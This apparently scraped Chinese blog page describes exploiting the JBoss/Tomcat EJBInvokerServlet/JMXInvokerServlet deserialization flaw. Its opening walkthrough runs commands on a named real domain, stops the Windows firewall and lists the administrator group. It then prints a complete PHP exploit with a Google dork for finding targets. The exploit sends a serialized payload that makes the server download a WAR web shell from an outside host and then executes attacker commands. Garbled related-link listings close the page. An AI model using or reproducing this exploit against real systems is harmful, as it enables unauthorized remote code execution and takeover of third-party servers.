Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE漏洞利用

检测发现存在Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE漏洞,该漏洞是2013年10月4日公布的。漏洞利用方法如下:

D:\ProgramFiles\PHPnow-1.5.6\php-5.2.14-Win32>php.exe  shell.php csice.org.cn  “systeminfo”    //查看系统信息

D:\ProgramFiles\PHPnow-1.5.6\php-5.2.14-Win32>php.exe  shell.php csice.org.cn  “netstat -an”    //查看系统端口

发现开放了远程3389,尝试连接,失败。

这里判断可能是防火墙限制了远程访问地址,查看下系统开启的服务,

D:\ProgramFiles\PHPnow-1.5.6\php-5.2.14-Win32>php.exe  shell.php csice.org.cn  “net start”    //查看系统服务

发现开启了windows 防火墙,这里关闭防火墙,

D:\Program Files\PHPnow-1.5.6\php-5.2.14-Win32>php.exe shell.php csice.org.cn “net stop sharedaccess”

下面的思路很简单了,添加用户-提升至管理员组-再次远程连接

D:\Program Files\PHPnow-1.5.6\php-5.2.14-Win32>php.exe shell.php csice.org.cn “net user”

D:\Program Files\PHPnow-1.5.6\php-5.2.14-Win32>php.exe shell.php csice.org.cn “net localgroup administrators”

Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE

/*

Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object

Remote Code Execution

google dork: inurl:status EJBInvokerServlet

this was used successfully on Windows during a penetration test against

McAfee Web Reporter 5.2.1 (tcp port 9111/http) gaining administrative privileges

see: http://www.mcafee.com/it/downloads/downloads.aspx

file tested: webreporter64bit.zip

Usage:

C:\PHP>php 9sg_ejb.php 192.168.0.1 id

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=2006101

62339)/Tomcat-5.5

Set-Cookie: JSESSIONID=E9EEE1D6AD27D64ED3835C1092C4FC29; Path=/

Content-Type: text/html;charset=ISO-8859-1

Content-Length: 43

Date: Fri, 04 Oct 2013 07:25:48 GMT

Connection: close

uid=0(root) gid=0(root) groups=0(root)

C:\PHP>

~ rgod ~

*/

$host=$argv[1];

$cmd=$argv[2];

//$port=9111; //mcafee

$port=80;

//small jsp shell

//change this if you want, url to the app to be deployed, keep it short

$url="http://retrogod.altervista.org/a.war?";

$url_len=pack("n",strlen($url));

function hex_dump($data, $newline="\n") {

static $from = '';

static $to = '';

static $width = 16; static $pad = '.';

if ($from==='') {

for ($i=0; $i<=0xFF; $i++) {

$from .= chr($i);

$to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;

}

}

$hex = str_split(bin2hex($data), $width*2);

$chars = str_split(strtr($data, $from, $to), $width);

$offset = 0;

foreach ($hex as $i => $line) {

echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline;

$offset += $width;

}

}

$frag_i=

"\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73". // ....sr.) org.jbos

"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72". // s.invoca tion.Mar

"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f". // shalledI nvocatio

"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77". // n...'A>. ....xppw

"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76". // .x..G..S .sr..jav

"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2". // a.lang.I nteger..

"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75". // .....8.. .I..valu

"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e". // exr..jav a.lang.N

"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00". // umber... ........

"\x78\x70\x26\x95\xbe\x0a\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62". // xp&...sr .$org.jb

"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d". // oss.invo cation.M

"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc". // arshalle dValue..

"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x77";

$frag_ii="\x00";

$frag_iii=

"\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e". // .....ur. .[Ljava.

"\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f". // lang.Obj ect;..X.

"\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00". // .s)l...x p....sr.

"\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e". // .javax.m anagemen

"\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b". // t.Object Name....

"\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73". // .m.....x pt.!jbos

"\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65". // s.system :service

"\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78\x74\x00". // =MainDep loyerxt.

"\x06\x64\x65\x70\x6c\x6f\x79\x75\x71\x00\x7e\x00\x00\x00\x00\x00". // .deployu q.~.....

"\x01\x74".

$url_len.

$url.

"\x75\x72\x00".

"\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61". // ur..[ Ljava.la

"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d". // ng.Strin g;..V...

"\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61". // {G...xp. ...t..ja

"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67";

$frag_iv=

"\x0d\xd3".

"\xbe\xc9\x78\x77\x04\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67". // ..xw.... .sr."org

"\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f". // .jboss.i nvocatio

"\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8". // n.Invoca tionKey.

"\xfb\x72\x84\xd7\x93\x85\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64". // .r...... ..I..ord

"\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x05\x73\x71\x00\x7e\x00\x05". // inalxp.. ..sq.~..

"\x77\x0d\x00\x00\x00\x05\xac\xed\x00\x05\x70\xfb\x57\xa7\xaa\x78". // w....... ..p.W..x

"\x77\x04\x00\x00\x00\x03\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x04". // w.....sq .~......

"\x73\x72\x00\x23\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e". // sr.#org. jboss.in

"\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74". // vocation .Invocat

"\x69\x6f\x6e\x54\x79\x70\x65\x59\xa7\x3a\x1c\xa5\x2b\x7c\xbf\x02". // ionTypeY .:..+|..

"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00". // ..I..ord inalxp..

"\x00\x01\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x0a\x70\x74\x00\x0f". // ..sq.~.. ....pt..

"\x4a\x4d\x58\x5f\x4f\x42\x4a\x45\x43\x54\x5f\x4e\x41\x4d\x45\x73". // JMX_OBJE CT_NAMEs

"\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d". // r..javax .managem

"\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03". // ent.Obje ctName..

"\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62". // ...m.... .xpt.!jb

"\x6f\x73\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69". // oss.syst em:servi

"\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78". // ce=MainD eployerx

"\x78"; // x

$data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv;

//$pk=""POST /invoker/JMXInvokerServlet/ HTTP/1.1\r\n". //the same ...

$pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n".

"ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n".

"Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n".

"User-Agent: Java/1.6.0_21\r\n".

"Host: ".$host.":".$port."\r\n".

"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n".

"Connection: keep-alive\r\n".

"Content-type: application/x-www-form-urlencoded\r\n".

"Content-Length: ".strlen($data)."\r\n\r\n".

$data;

echo hex_dump($pk)."\n";

$fp=fsockopen($host,$port,$e,$err,3);

fputs($fp,$pk);

$out=fread($fp,8192);

fclose($fp);

echo hex_dump($out)."\n";

sleep(5);

$pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0\r\n".

"Host: ".$host.":".$port."\r\n".

"Connection: Close\r\n\r\n";

echo hex_dump($pk)."\n";

$fp=fsockopen($host,$port,$e,$err,3);

fputs($fp,$pk);

$out="";

while (!feof($fp)) {

$out.=fread($fp,8192);

}

fclose($fp);

echo $out;

?>

php x24 x65 x6d x61,Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet 漏洞利用相关推荐

  1. php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限

    此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...

  2. [转]总结:Apache/Tomcat/JBOSS/Jetty/Nginx区别 .

    总结:Apache/Tomcat/JBOSS/Nginx区别 . 1.Apache是Web服务器,Tomcat是应用(Java)服务器.Tomcat在中小型系统和并发访问用户不是很多的场合下被普遍使用 ...

  3. Apache/Tomcat/JBOSS/Nginx区别

    2019独角兽企业重金招聘Python工程师标准>>> Apache/Tomcat/JBOSS/Nginx区别 博客分类: 中间件 先说Apache和Tomcat的区别: Apach ...

  4. Apache Tomcat 曝文件包含漏洞:攻击者可利用该漏洞读取webapp目录下的任意文件...

    点击上方蓝色"程序猿DD",选择"设为星标" 回复"资源"获取独家整理的学习资料! 作者 | oschina 来源 | https://ww ...

  5. 墨者学院Tomcat 远程代码执行漏洞利用

    墨者学院Tomcat 远程代码执行漏洞利用 进靶场后界面是这样的,先用bp抓包 发现抓不到包,刷新两下然后放包试试,放包到看到这个界面就可以了,看地址判断有没有抓到包 抓到包之后用PUT传参 这里可以 ...

  6. 墨者学院tomcat后台弱口令漏洞利用

    墨者学院tomcat后台弱口令漏洞利用 点击之后要我们登录,这里abc123:999user是base64解码之后的结果,可见要爆破base64编码,这里不写爆破过程了,下一期出一下爆破过程,这里直接 ...

  7. Apache/Tomcat/JBOSS/Neginx/lighttpd/Jetty 的区别

    先说Apache和Tomcat的区别: Apache是世界使用排名第一的Web服务器软件.它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一. ...

  8. 关于Apache/Tomcat/JBOSS/Neginx/lighttpd/Jetty等一些常见服务器的区别比较和理解

    先说Apache和Tomcat的区别: Apache是世界使用排名第一的Web服务器软件.它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一. ...

  9. 【通告更新】Apache Tomcat服务器文件包含漏洞安全风险通告第三次更新

    近日,奇安信CERT监测到CNVD发布了漏洞公告,对应CNVD漏洞编号:CNVD-2020-10487.CVE漏洞编号:CVE-2020-1938.CNVD漏洞公告称Apache Tomcat服务器存 ...

最新文章

  1. 《Linux企业应用案例精解》一书已由清华大学出版社出版
  2. entity framework 6 我写了一个公用数据类
  3. OpenGL开发学习指南一(freeglut+glew)
  4. 四十六、MongoDB数据库学习
  5. STM32F407VG uCOS-II2.91 IAR工程 以及uCOS使用库编译的方法
  6. 蓝桥杯 - 试题 J: 砍竹子(双向链表+堆/思维)
  7. Netty 4.0 新的特性及需要注意的地方
  8. LeetCode 第 28 场双周赛(505/2144,前23.6%)
  9. 2018-2019-1 20165221 《信息安全系统设计基础》第一周学习总结
  10. 双系统的电脑中如何完美系统其中一个操作系统
  11. 8.3实例程序:平面阴影
  12. 制作简单的GIF动图
  13. html服装商品分类页面,商品分类.html
  14. 计算机在中医临床学的应用,中医临床学术论文(2)
  15. vue实现websoket即时通讯
  16. 手机端通过Es文件浏览器访问windows服务器用File Zilla Sever软件 分享的文件
  17. oppo文件管理android在哪里,OPPO手机中缓存视频文件路径在哪里查看?怎么查看?
  18. XPE及CE系统对比
  19. 的确,Java存在缺陷。但是……
  20. java 扰码工具_【Developer Log】ProGuard扰码可执行JAR包

热门文章

  1. recommend a book for android newcomer
  2. 四位直读表PCB设计
  3. Android:禁用全局多点触控
  4. 可视化大屏项目适配 vue
  5. java计算机毕业设计足球队管理系统源程序+mysql+系统+lw文档+远程调试
  6. php微信公众点歌台,微信公众平台开发在线点歌功能介绍
  7. 电子围栏绘制、校验、不同坐标系(wgs84,jcg02、bd09)的相互转换,看这一篇就够了!
  8. 高频交易对市场的影响
  9. RPG游戏《黑暗之光》流程介绍与代码分析之(十):主角状态信息界面与小地图的实现
  10. TMS320F28x的定时器